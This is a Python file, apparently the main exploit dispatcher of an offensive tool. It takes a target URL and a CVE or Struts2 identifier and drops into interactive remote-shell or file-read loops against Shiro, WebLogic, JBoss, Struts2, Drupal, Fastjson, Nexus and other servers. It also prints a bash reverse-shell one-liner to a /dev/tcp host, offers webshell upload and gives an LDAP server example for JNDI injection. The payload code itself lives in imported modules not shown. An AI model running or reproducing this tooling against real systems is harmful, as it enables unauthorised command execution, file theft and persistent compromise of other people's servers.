#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
from module import globals
from module.time import now
from module.color import color
from module.allcheck import os_check, url_check, survival_check
from payload.ApacheShiro import ApacheShiro
from payload.ApacheSolr import ApacheSolr
from payload.ApacheTomcat import ApacheTomcat
from payload.Elasticsearch import Elasticsearch
from payload.Jenkins import Jenkins
from payload.Spring import Spring
from payload.OracleWeblogic import OracleWeblogic
from payload.ApacheFlink import ApacheFlink
from payload.Nexus import Nexus
from payload.RadHatJBoss import RedHatJBoss
from payload.ApacheUnomi import ApacheUnomi
from payload.ThinkPHP import ThinkPHP
from payload.Drupal import Drupal
from payload.ApacheStruts2 import ApacheStruts2
from payload.Fastjson import Fastjson


explists = ("CVE-2017-12629", "CVE-2019-17558", "S2-005", "S2-008", "S2-009", "S2-013", "S2-015", "S2-016", "S2-029",
            "S2-032", "S2-045", "S2-046", "S2-048", "S2-052", "S2-057", "S2-059", "S2-061", "S2-devMode",
            "CVE-2014-3120", "CVE-2015-1427", "CVE-2016-3088", "CVE-2016-4437", "CVE-2017-12615", "CVE-2020-1938",
            "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-6340", "CVE-2018-1000861", "CVE-2019-7238", "CVE-2020-10199",
            "CVE-2017-3506", "CVE-2017-10271", "CVE-2018-2894", "CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2555",
            "CVE-2020-2883", "CVE-2020-14882", "CVE-2010-0738", "CVE-2010-1428", "CVE-2015-7501", "CVE-2018-20062",
            "CVE-2019-9082", "CVE-2020-13942", "CVE-2020-17519", "CVE-2019-3799", "CVE-2020-5410", "cve-2017-12629",
            "cve-2019-17558", "s2-005", "s2-008", "s2-009", "s2-013", "s2-015", "s2-016", "s2-029", "s2-032",
            "s2-045", "s2-046",  "s2-048", "s2-052", "s2-057", "s2-059", "s2-061", "s2-devmode", "cve-2014-3120",
            "cve-2015-1427", "cve-2016-3088", "cve-2016-4437", "cve-2017-12615", "cve-2020-1938", "cve-2018-7600",
            "cve-2018-7602", "cve-2019-6340", "cve-2018-1000861", "cve-2019-7238", "cve-2020-10199", "cve-2017-3506",
            "cve-2017-10271", "cve-2018-2894", "cve-2019-2725", "cve-2019-2729", "cve-2020-2555", "cve-2020-2883",
            "cve-2020-14882", "cve-2010-0738", "cve-2010-1428", "cve-2015-7501", "cve-2018-20062", "cve-2019-9082",
            "cve-2020-13942", "cve-2020-17519", "cve-2019-3799", "cve-2020-5410", "1.2.24", "1.2.47", "1.2.62")


def exploit(target, vul_num):
    target = url_check(target)
    if survival_check(target) == "f":
        print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + target))
        exit(0)
    delay = globals.get_value("DELAY")  # 获取全局变量DELAY
    exp_apache_shiro = ApacheShiro(target)
    exp_apache_solr = ApacheSolr(target)
    exp_apache_tomcat = ApacheTomcat(target)
    exp_elasticsearch = Elasticsearch(target)
    exp_apache_flink = ApacheFlink(target)
    exp_jenkins = Jenkins(target)
    exp_spring = Spring(target)
    exp_nexus = Nexus(target)
    exp_oracle_weblogic = OracleWeblogic(target)
    exp_redhat_jboss = RedHatJBoss(target)
    exp_apache_unomi = ApacheUnomi(target)
    exp_thinkphp = ThinkPHP(target)
    exp_drupal = Drupal(target)
    exp_fastjson = Fastjson(target)
    exp_apache_struts2 = ApacheStruts2(target)
    print(now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target))
    print(now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num))
    nc = now.timed(de=0) + color.yel_info() + color.yellow(" input \"nc\" bounce linux shell")
    up = now.timed(de=0) + color.yel_info() + color.yellow(" input \"upload\" upload webshell")
    rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
    bash = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
    cmd = "whoami"  # 为了消除pycharm错误提示，没啥用
    file = "/etc/passwd"  # 为了消除pycharm错误提示，没啥用
    shiro_key = "1"  # 为了消除pycharm错误提示，没啥用
    shiro_gadget = "1"  # 为了消除pycharm错误提示，没啥用
    nexus_u = "admin"  # 为了消除pycharm错误提示，没啥用
    nexus_p = "admin"  # 为了消除pycharm错误提示

    if vul_num not in explists:
        print(now.timed(de=0) + color.red_warn() + color.red(
            " The vulnerability does not support exploitation. Please refer to \"--list\""))
        sys.exit(0)

    elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
        if os_check() == "linux" or os_check() == "other":
            shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
            shiro_gadget = input(now.timed(de=delay) + color.green("[+] gadget: "))
        elif os_check() == "windows":
            shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
            shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
    elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
        print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_tomcat.cve_2020_1938_exp(file)
    elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
        print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2019_3799_exp(file)
    elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
        print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2020_5410_exp(file)
    elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
        print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_flink.cve_2020_17519_exp(file)
    elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
        if os_check() == "linux" or os_check() == "other":
            nexus_u = input(now.timed(de=delay) + color.green("[+] Input username: "))
            nexus_p = input(now.timed(de=delay) + color.green("[+] Input password: "))
        elif os_check() == "windows":
            nexus_u = input(now.no_color_timed(de=delay) + "[+] Input username: ")
            nexus_p = input(now.no_color_timed(de=delay) + "[+] Input password: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)

    # 远程命令执行漏洞单独简单运行
    else:
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                exit(0)
            elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
                exp_apache_tomcat.cve_2017_12615_exp(cmd)
            elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
                exp_elasticsearch.cve_2014_3120_exp(cmd)
            elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
                exp_elasticsearch.cve_2015_1427_exp(cmd)
            elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
                exp_jenkins.cve_2018_1000861_exp(cmd)

            elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
                exp_oracle_weblogic.cve_2017_3506_exp(cmd)
            elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2017_10271_exp(cmd)
            elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
                exp_oracle_weblogic.cve_2018_2894_exp(cmd)
            elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2019_2725_exp(cmd)
            elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
                print(nc)
                exp_oracle_weblogic.cve_2019_2729_exp(cmd)
            elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
                exp_oracle_weblogic.cve_2020_2555_exp(cmd)
            elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
                exp_oracle_weblogic.cve_2020_2883_exp(cmd)
            elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
                exp_oracle_weblogic.cve_2020_14882_exp(cmd)
            elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
                exp_apache_solr.cve_2017_12629_exp(cmd)
            elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
                exp_apache_solr.cve_2019_17558_exp(cmd)
            elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
                exp_nexus.cve_2019_7238_exp(cmd)
            elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
                exp_redhat_jboss.cve_2010_0738_exp(cmd)
            elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
                exp_redhat_jboss.cve_2010_1428_exp(cmd)
            elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
                exp_redhat_jboss.cve_2015_7501_exp(cmd)
            elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
                exp_apache_unomi.cve_2020_13942_exp(cmd)

            elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
                print(up)
                exp_thinkphp.cve_2019_9082_exp(cmd)
            elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
                exp_thinkphp.cve_2018_20062_exp(cmd)
            elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
                exp_drupal.cve_2018_7600_exp(cmd)
            elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
                exp_drupal.cve_2018_7602_exp(cmd)
            elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
                exp_drupal.cve_2019_6340_exp(cmd)

            elif vul_num == "S2-005" or vul_num == "s2-005":
                exp_apache_struts2.s2_005_exp(cmd)
            elif vul_num == "S2-008" or vul_num == "s2-008":
                exp_apache_struts2.s2_008_exp(cmd)
            elif vul_num == "S2-009" or vul_num == "s2-009":
                exp_apache_struts2.s2_009_exp(cmd)
            elif vul_num == "S2-013" or vul_num == "s2-013":
                exp_apache_struts2.s2_013_exp(cmd)
            elif vul_num == "S2-015" or vul_num == "s2-015":
                exp_apache_struts2.s2_015_exp(cmd)
            elif vul_num == "S2-016" or vul_num == "s2-016":
                exp_apache_struts2.s2_016_exp(cmd)
            elif vul_num == "S2-029" or vul_num == "s2-029":
                exp_apache_struts2.s2_029_exp(cmd)
            elif vul_num == "S2-032" or vul_num == "s2-032":
                exp_apache_struts2.s2_032_exp(cmd)
            elif vul_num == "S2-045" or vul_num == "s2-045":
                exp_apache_struts2.s2_045_exp(cmd)
            elif vul_num == "S2-046" or vul_num == "s2-046":
                exp_apache_struts2.s2_046_exp(cmd)
            elif vul_num == "S2-048" or vul_num == "s2-048":
                exp_apache_struts2.s2_048_exp(cmd)
            elif vul_num == "S2-052" or vul_num == "s2-052":
                exp_apache_struts2.s2_052_exp(cmd)
            elif vul_num == "S2-057" or vul_num == "s2-057":
                exp_apache_struts2.s2_057_exp(cmd)
            elif vul_num == "S2-059" or vul_num == "s2-059":
                exp_apache_struts2.s2_059_exp(cmd)
            elif vul_num == "S2-061" or vul_num == "s2-061":
                exp_apache_struts2.s2_061_exp(cmd)
            elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
                exp_apache_struts2.s2_devMode_exp(cmd)

            elif vul_num == "1.2.24":
                print(rmi_ldap)
                exp_fastjson.fastjson_1224_exp(cmd)
            elif vul_num == "1.2.47":
                print(rmi_ldap)
                exp_fastjson.fastjson_1247_exp(cmd)
            elif vul_num == "1.2.62":
                print(rmi_ldap)
                exp_fastjson.fastjson_1262_exp(cmd)
            else:
                pass
